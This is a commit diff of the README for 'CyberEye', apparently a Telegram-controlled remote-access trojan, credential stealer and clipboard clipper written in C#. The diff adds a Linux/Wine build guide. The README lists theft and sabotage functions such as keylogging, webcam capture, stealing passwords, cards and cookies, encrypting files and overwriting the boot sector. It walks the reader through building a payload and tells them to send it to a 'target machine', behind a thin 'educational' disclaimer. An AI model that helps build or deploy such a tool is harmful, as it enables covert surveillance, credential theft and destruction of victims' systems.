1- # 👁️ CyberEye (RAT + STEALER + CLIPPER)
1+ # 👁️ CyberEye (RAT + STEALER + CLIPPER) < a id = " cybereye-rat-stealer-clipper " ></ a >
22Modded Program for remote control of windows computers via telegram bot. Written in C#
33<p align =" center " >
44 <img src =" images/logo.jpg " >
@@ -12,15 +12,43 @@ Modded Program for remote control of windows computers via telegram bot. Written
1212 </a >
1313</div >
1414
15- ### LEGAL DISCLAIMER PLEASE READ!
16- ##### I, the creator and all those associated with the development and production of this program are not responsible for any actions and or damages caused by this software. You bear the full responsibility of your actions and acknowledge that this software was created for educational purposes only. This software's intended purpose is NOT to be used maliciously, or on any system that you do not have own or have explicit permission to operate and use this program on. By using this software, you automatically agree to the above.
15+ ### LEGAL DISCLAIMER PLEASE READ! < a id = " legal-disclaimer " ></ a >
16+ ##### I, the creator and all those associated with the development and production of this program are not responsible for any actions and or damages caused by this software. You bear the full responsibility of your actions and acknowledge that this software was created for educational purposes only. This software's intended purpose is NOT to be used maliciously, or on any system that you do not have own or have explicit permission to operate and use this program on. By using this software, you automatically agree to the above. < a id = " responsibility-disclaimer " ></ a >
1717
18- # :fallen_leaf : Original Functions:
18+ ## 📑 Table of Contents
19+ - [ CyberEye (RAT + STEALER + CLIPPER)] ( #cybereye-rat-stealer-clipper )
20+ + [ LEGAL DISCLAIMER PLEASE READ!] ( #legal-disclaimer )
21+ * [ Responsibility Disclaimer] ( #responsibility-disclaimer )
22+ - [ Original Functions] ( #original-functions )
23+ - [ Modded Functions] ( #modded-functions )
24+ - [ Compiling guide using Builder] ( #compiling-guide-builder )
25+ - [ Compiling guide using Builder Wine/Linux] ( #compiling-guide-builder-wine-linux )
26+ * [ System Requirements] ( #system-requirements )
27+ + [ Minimum] ( #minimum )
28+ + [ Recommended] ( #recommended )
29+ * [ Installation Process] ( #installation-process )
30+ + [ 1. Install Dependencies] ( #install-dependencies )
31+ - [ Ubuntu/Debian] ( #ubuntu-debian )
32+ - [ Arch Linux/Manjaro] ( #arch-linux-manjaro )
33+ - [ Fedora] ( #fedora )
34+ * [ .NET Framework 4.8 Installation] ( #net-framework-48-installation )
35+ - [ Clean Setup] ( #clean-setup )
36+ - [ Install .NET 4.8] ( #install-net-48 )
37+ - [ Verify Installation] ( #verify-installation )
38+ * [ Wine / Linux Common Troubleshooting Guide] ( #wine-linux-troubleshooting-guide )
39+ + [ Standalone Payload Builder Introduction] ( #standalone-payload-builder-intro )
40+ * [ Key Features] ( #key-features )
41+ + [ Builder Highlights] ( #builder-highlights )
42+ - [ Alternative (OLD) Compiling guide using Visual Studio] ( #alternative-old-compiling-guide-visual-studio )
43+ * [ Star History] ( #star-history )
44+ - [ Donate] ( #donate )
45+
46+ # :fallen_leaf : Original Functions: <a id =" original-functions " ></a >
1947ComputerInfo, BatteryInfo, Location, Whois, ActiveWindow, Webcam, Microphone, Desktop, Keylogger, ClipboardSet, ClipboardGet, ProcessList, ProcessKill, ProcessStart, TaskManagerDisable, TaskManagerEnable, MinimizeAllWindows, MaximizeAllWindows, GetPasswords, GetCreditCards, GetHistory, GetBookmarks, GetCookies, GetDesktop, GetFileZilla, GetDiscord, GetTelegram, GetSteam, OpenCD, CloseCD, DownloadFile, UploadFile, RunFile, RunFileAdmin, ListFiles, RemoveFile, RemoveDir, MoveFile, MoveDir, CopyFile, CopyDir, Speak, Shell, MessageBox, OpenURL, SendKeyPress, NetDiscover, AudioVolumeSet, AudioVolumeGet, SetWallPaper, BlockInput, Monitor(off/on), DisplayRotate, EncryptFileSystem, DecryptFileSystem,ForkBomb, BsoD, OverwriteBootSector, Shutdown, Reboot, Hibernate, Logoff, Help, About, Uninstall.
2048
21- # Ⓜ Modded Functions:
49+ # Ⓜ Modded Functions: < a id = " modded-functions " ></ a >
2250AssemblyInfoChanging(config.cs), Beep, Cycle, Tray, SetRandomCurPos, Compiler, DirOrFile, Wifi_Steal, Regedit, Windefender, Cmd, SystemRestore, ScreenResolution, isAdmin, BugReport, Minecraft, CamList, MonitorList.
23- # :hammer : Compiling guide using Builder:
51+ # :hammer : Compiling guide using Builder: < a id = " compiling-guide-builder " ></ a >
2452
2553* Go to the [ @BotFather ] ( https://t.me/BotFather ) bot and create your own bot. You need to save the token and bot name.
2654 ![ ] ( images/createBot.JPG )
@@ -41,20 +69,209 @@ AssemblyInfoChanging(config.cs), Beep, Cycle, Tray, SetRandomCurPos, Compiler, D
4169* Click ** Build** , then choose where to save the final ` .exe ` payload.
4270 ![ ] ( images/BuilderBuild.jpg )
4371
72+ # :hammer : Compiling guide using Builder Wine/Linux: <a id =" compiling-guide-builder-wine-linux " ></a >
73+ ![ Wine Logo] ( https://www.unixmen.com/wp-content/uploads/2012/05/winehq-logo.png )
74+ * Run Windows .NET applications seamlessly on Linux*
75+
76+ This comprehensive guide will help you install and run ** CyberEye.Client.Builder.exe** on Linux systems using Wine and Winetricks.
77+
78+ ---
79+
80+ ## ✅ System Requirements <a id =" system-requirements " ></a >
81+
82+ ### Minimum: <a id =" minimum " ></a >
83+ - ** OS** : Ubuntu 20.04+, Debian 10+, Arch Linux, Fedora 33+
84+ - ** RAM** : 4GB
85+ - ** Storage** : 10GB free space
86+ - ** Wine** : 7.0+ (stable)
87+ - ** Winetricks** : latest
88+
89+ ### Recommended: <a id =" recommended " ></a >
90+ - ** CPU** : 4 cores+
91+ - ** RAM** : 8GB+
92+ - ** Storage** : SSD with 20GB+ free space
93+
94+ ---
95+
96+ ## ⚙️ Installation Process <a id =" installation-process " ></a >
97+
98+ ### 1. Install Dependencies <a id =" install-dependencies " ></a >
99+
100+ #### Ubuntu/Debian: <a id =" ubuntu-debian " ></a >
101+ ``` bash
102+ sudo dpkg --add-architecture i386
103+ sudo apt update
104+ sudo apt install -y \
105+ wine64 \
106+ wine32 \
107+ winetricks \
108+ cabextract \
109+ libgl1-mesa-glx:i386
110+ ```
111+
112+ #### Arch Linux/Manjaro: <a id =" arch-linux-manjaro " ></a >
113+ ``` bash
114+ sudo pacman -S \
115+ wine \
116+ winetricks \
117+ lib32-mesa \
118+ giflib \
119+ lib32-giflib \
120+ libpng \
121+ lib32-libpng \
122+ libldap \
123+ lib32-libldap \
124+ gnutls \
125+ lib32-gnutls \
126+ mpg123 \
127+ lib32-mpg123 \
128+ openal \
129+ lib32-openal \
130+ v4l-utils \
131+ lib32-v4l-utils \
132+ libpulse \
133+ lib32-libpulse \
134+ alsa-plugins \
135+ lib32-alsa-plugins \
136+ alsa-lib \
137+ lib32-alsa-lib \
138+ libjpeg-turbo \
139+ lib32-libjpeg-turbo \
140+ libxcomposite \
141+ lib32-libxcomposite \
142+ libxinerama \
143+ lib32-libxinerama \
144+ ncurses \
145+ lib32-ncurses \
146+ opencl-icd-loader \
147+ lib32-opencl-icd-loader \
148+ libxslt \
149+ lib32-libxslt \
150+ libva \
151+ lib32-libva \
152+ gtk3 \
153+ lib32-gtk3 \
154+ vulkan-icd-loader \
155+ lib32-vulkan-icd-loader
156+ ```
157+
158+ #### Fedora: <a id =" fedora " ></a >
159+ ``` bash
160+ sudo dnf install \
161+ wine \
162+ winetricks \
163+ cabextract \
164+ vulkan-loader.i686 \
165+ mesa-dri-drivers.i686
166+ ```
167+
168+ ## 🛠️ .NET Framework 4.8 Installation <a id =" net-framework-48-installation " ></a >
169+ #### Clean Setup: <a id =" clean-setup " ></a >
170+ ``` bash
171+ # Remove existing prefix
172+ rm -rf ~ /.wine-dotnet48
173+
174+ # Initialize 32-bit prefix
175+ WINEARCH=win32 WINEPREFIX=~ /.wine-dotnet48 wineboot --init
176+
177+ # Install dependencies
178+ WINEPREFIX=~ /.wine-dotnet48 winetricks -q \
179+ corefonts \
180+ tahoma \
181+ gdiplus \
182+ msxml3 \
183+ msxml6 \
184+ vcrun2010 \
185+ vcrun2013 \
186+ vcrun2019
187+ ```
188+ #### Install .NET 4.8: <a id =" install-net-48 " ></a >
189+ ``` bash
190+ WINEPREFIX=~ /.wine-dotnet48 winetricks --force dotnet48
191+ ```
192+ ⏳ Installation takes 15-45 minutes. You'll see multiple Windows installers - just click "Next" through all of them.
193+
194+ #### Verify Installation: <a id =" verify-installation " ></a >
195+ ``` bash
196+ WINEPREFIX=~ /.wine-dotnet48 wine reg query " HKLM\\ Software\\ Microsoft\\ NET Framework Setup\\ NDP\\ v4\\ Full"
197+ ```
198+ Should show version 4.8.xxxx.
199+
200+ * Go to the [ @BotFather ] ( https://t.me/BotFather ) bot and create your own bot. You need to save the token and bot name.
201+ ![ ] ( images/createBot.JPG )
202+ * Now you need to get your chat id. To do this, go to the next bot [ @chatid_echo_bot] ( https://t.me/chatid_echo_bot ) and save the id.
203+ ![ ] ( images/chatidBot.JPG )
204+ * Now you need to download [ Latest stable release] ( https://github.com/cisamu123/CyberEye/releases )
205+ ![ ] ( images/DownloadAndUnzipBuilder.jpg )
206+ * After downloading the ` .zip ` archive, extract it to any folder on your system.
207+ * Inside the extracted folder, run the file ` CyberEye.Client.Builder.exe `
208+ ![ ] ( images/ExecuteBuilder.jpg )
209+ ``` bash
210+ WINEPREFIX=~ /.wine-dotnet48 wine CyberEye.Client.Builder.exe
211+ ```
212+ * ⚠️ ** Important:** Make sure to also move the entire ` Stub ` folder (included in the archive) to the ** same directory** as the Builder.
213+ Without the ` Stub ` folder in the correct location, the builder will not be able to generate the final payload.
214+ * In the builder, fill in the required fields:
215+ - ** Bot Token** (from [ @BotFather ] ( https://t.me/BotFather ) )
216+ - ** Chat ID** (from [ @chatid_echo_bot] ( https://t.me/chatid_echo_bot ) )
217+ - Enable optional features using checkboxes (e.g., Autorun, BSOD Protection, etc.)
218+
219+ * Click ** Build** , then choose where to save the final ` .exe ` payload.
220+ ![ ] ( images/BuilderLinux.png )
221+
222+ ## 🧯 Wine / Linux Common Troubleshooting Guide: <a id =" wine-linux-troubleshooting-guide " ></a >
223+ ❌ Wine Mono is not installed
224+
225+ Fix:
226+
227+ Install Wine Mono manually or recreate the Wine prefix:
228+ ```
229+ rm -rf ~/.wine
230+ winecfg # Accept prompts to install Mono and Gecko
231+ ```
232+ ❌ ilasm.exe not found. Ensure .NET Framework is installed
233+
234+ Cause: .NET was not installed or was installed into a 64-bit prefix.
235+
236+ Fix:
237+
238+ Use a clean 32-bit prefix.
239+
240+ Reinstall .NET Framework via Winetricks:
241+
242+ WINEARCH=win32 WINEPREFIX=~/.wine-dotnet48 winetricks dotnet48
243+
244+ ❌ wine: could not load kernel32.dll, status c0000135
245+
246+ Cause: Corrupted Wine prefix or failed .NET install due to wrong architecture or low disk space.
247+
248+ Fix:
249+
250+ Ensure you have enough free disk space:
251+ ```
252+ df -h ~
253+ ```
254+ Recreate the prefix with the correct architecture:
255+ ```
256+ rm -rf ~/.wine-dotnet48
257+ WINEARCH=win32 WINEPREFIX=~/.wine-dotnet48 winecfg
258+ WINEPREFIX=~/.wine-dotnet48 winetricks dotnet48
259+ ```
260+
44261✅ That’s it — no need to touch Visual Studio. Just fill, click, and deploy!
45262* You can send the generated .exe payload to your target machine.
46263* After starting the file, you can control the computer through the bot.
47264 ![ ] ( images/openMalware.JPG )
48265* Write ` /help ` to see all available commands.
49- ### ** This release introduces a new standalone payload builder for CyberEye RAT, enabling users to generate customized payloads with ease.**
266+ ### ** This release introduces a new standalone payload builder for CyberEye RAT, enabling users to generate customized payloads with ease.** < a id = " standalone-payload-builder-intro " ></ a >
50267
51- ## 🔑 Key Features
268+ ## 🔑 Key Features < a id = " key-features " ></ a >
52269
53270> Creating and customizing your own RAT has never been easier.
54271> With the new ** Builder** , you no longer need to open Visual Studio, manually edit config files, or compile the project yourself.
55272> Simply run the Builder, fill in your desired options, and generate a fully working stub with just one click.
56273
57- ### 🧱 Builder Highlights
274+ ### 🧱 Builder Highlights < a id = " builder-highlights " ></ a >
58275- ** No coding required** – Everything is done through a user-friendly GUI.
59276- ** Instant build** – Generates a ready-to-use executable without needing Visual Studio or any compiler setup.
60277- ** Secure Telegram Integration** – Easily input your bot token and chat ID.
@@ -65,7 +282,7 @@ AssemblyInfoChanging(config.cs), Beep, Cycle, Tray, SetRandomCurPos, Compiler, D
65282> Developed by ** Cisamu**
66283> Now enhanced with an easy-to-use Builder to streamline your workflow.
67284
68- # :hammer : Alternative (OLD) Compiling guide using Visual Studio:
285+ # :hammer : Alternative (OLD) Compiling guide using Visual Studio: < a id = " alternative-old-compiling-guide-visual-studio " ></ a >
69286* Go to the [ @BotFather ] ( https://t.me/BotFather ) bot and create your own bot. You need to save the token and bot name.
70287 ![ ] ( images/createBot.JPG )
71288* Now you need to get your chat id. To do this, go to the next bot [ @chatid_echo_bot] ( https://t.me/chatid_echo_bot ) and save the id.
@@ -88,11 +305,11 @@ AssemblyInfoChanging(config.cs), Beep, Cycle, Tray, SetRandomCurPos, Compiler, D
88305 ![ ] ( images/openMalware.JPG )
89306* Write ` /help ` to see all available commands.
90307
91- ## Star History
308+ ## Star History < a id = " star-history " ></ a >
92309
93310[ ![ Star History Chart] ( https://api.star-history.com/svg?repos=cisamu123/CyberEye&type=Date )] ( https://star-history.com/#cisamu123/CyberEye&Date )
94311
95- # :moneybag : Donate:
312+ # :moneybag : Donate: < a id = " donate " ></ a >
96313** BTC:** ` bc1q5exw2v9sa0yktp2t7xnq8ma2xpn5a29s7w283y `
97314** ETH:** ` 0x8d797249170d263B959A3c688D8456adBcfBC319 `
98315** XMRT:** ` 0xF978FE35d00A201eB48aB3908993e14f312001a2 `
0 commit comments